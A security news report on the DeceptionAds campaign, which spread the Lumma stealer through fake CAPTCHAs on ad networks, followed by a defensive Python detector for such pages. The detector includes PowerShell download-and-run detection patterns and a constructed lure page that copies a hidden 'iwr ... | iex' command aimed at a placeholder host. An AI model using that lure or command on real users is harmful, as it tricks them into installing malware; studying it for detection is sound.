Man
Professional
A large-scale campaign distributing the Lumma stealer, allegedly run by cybercriminals from the Vane Viper group, has been discovered. Guardio Labs analysts uncovered it and noted that the main infection method was fake CAPTCHAs that prompted potential victims to execute PowerShell commands.
The campaign itself was named DeceptionAds. The Monetag advertising network was chosen as the primary distribution channel, which allowed the attackers to display more than a million advertisements across 3,000 sites daily. Analysts note that DeceptionAds is an evolved version of ClickFix, which also tricks victims into executing malicious commands. The key difference is that Vane Viper managed to adapt a legitimate advertising network for distribution.
Users were lured in by pop-up banners promoting fake services related to pirated streaming platforms or software. After the ad is clicked, a check is performed to verify that the visitor is a real person, after which the victim is redirected to a page with a fake CAPTCHA. For disguise, the criminals use the BeMob service. Its normal purpose is to track the effectiveness of advertising campaigns, but in this case it helps to evade detection.
“By providing the Monetag system with a harmless BeMob URL instead of a direct link to a page with a fake CAPTCHA, the attackers exploit BeMob’s reputation, thereby complicating Monetag’s work to moderate content,” Guardio Labs explains.
The fake CAPTCHA page contains a JavaScript snippet that copies a short PowerShell command to the user's clipboard. The victim is then instructed to paste and execute the command via the Windows Run dialog. As a result, the Lumma stealer is downloaded to the user's device, ready to steal data from it. After the campaign was discovered, Monetag deleted 200 accounts belonging to the cybercriminals. However, researchers noticed that as of mid-December the attackers had simply moved to a different ad network.
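The combination described above (a script that writes to the clipboard, a PowerShell-looking string inside that script, and on-page instructions to open Run and paste) is what distinguishes a fake CAPTCHA page from an ordinary "copy this code" widget. The following Python heuristic is an added example written for this post; it is not code from Guardio Labs or from the campaign, and the two HTML pages it scans are constructed samples (the host name is a placeholder). It flags a page only when a clipboard write coincides with PowerShell-style content, and treats the Run/paste lure text as a confidence booster rather than a requirement.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Heuristic indicator sets (assumptions for this example, not a published rule set).
# 1. Script writes to the clipboard.
CLIPBOARD_RE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I
)
# 2. Clipboard payload looks like a PowerShell download-and-run command.
PS_PAYLOAD_RE = re.compile(
    r"powershell(?:\.exe)?|\biwr\b|\biex\b|invoke-(?:webrequest|expression)"
    r"|-w(?:indowstyle)?\s+hidden|\bmshta\b",
    re.I,
)
# 3. Page text walks the visitor through Win+R / Ctrl+V / Enter.
RUN_LURE_RE = re.compile(
    r"win(?:dows)?\s*(?:key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|press\s+enter"
    r"|i'?m\s+not\s+a\s+robot|verify\s+you\s+are\s+human",
    re.I,
)


@dataclass
class Verdict:
    clipboard_write: bool
    powershell_strings: list[str]  # distinct PowerShell-style tokens found, lowercased
    run_instructions: bool
    score: int
    suspicious: bool


def scan_page(html: str) -> Verdict:
    """Score a fetched page for the fake-CAPTCHA 'paste into Run' pattern."""
    clipboard = bool(CLIPBOARD_RE.search(html))
    ps_tokens = sorted({m.group(0).lower() for m in PS_PAYLOAD_RE.finditer(html)})
    lure = bool(RUN_LURE_RE.search(html))
    score = (2 if clipboard else 0) + (3 if ps_tokens else 0) + (2 if lure else 0)
    # A coupon widget also writes to the clipboard, so require both the
    # clipboard write and PowerShell-looking content before flagging.
    suspicious = clipboard and bool(ps_tokens)
    return Verdict(clipboard, ps_tokens, lure, score, suspicious)


# Constructed sample: a legitimate copy-to-clipboard widget (should NOT be flagged).
BENIGN_PAGE = """
<html><body>
<p>Your coupon code is <b>SAVE20</b>. Click the button to copy it.</p>
<button onclick="navigator.clipboard.writeText('SAVE20')">Copy code</button>
</body></html>
"""

# Constructed sample: fake CAPTCHA lure page (placeholder host, not a real payload URL).
FAKE_CAPTCHA_PAGE = """
<html><body>
<h2>Verify you are human</h2>
<p>1. Press Win + R &nbsp; 2. Press Ctrl + V &nbsp; 3. Press Enter</p>
<input type="checkbox" onclick="copyCmd()"> I'm not a robot
<script>
function copyCmd() {
  // constructed example string; placeholder.invalid never resolves
  navigator.clipboard.writeText('powershell -w hidden -c "iwr http://placeholder.invalid/x | iex"');
}
</script>
</body></html>
"""


if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("fake-captcha", FAKE_CAPTCHA_PAGE)):
        v = scan_page(page)
        print(f"{name:13s} suspicious={v.suspicious} score={v.score} tokens={v.powershell_strings}")
```

In practice this would run over proxy-captured or sandbox-fetched HTML for landing pages reached through ad redirects; the tracker hop (BeMob in this campaign) hides the final page from the ad network's moderation, so the scan has to happen on the page the browser actually lands on, not on the URL submitted to the network.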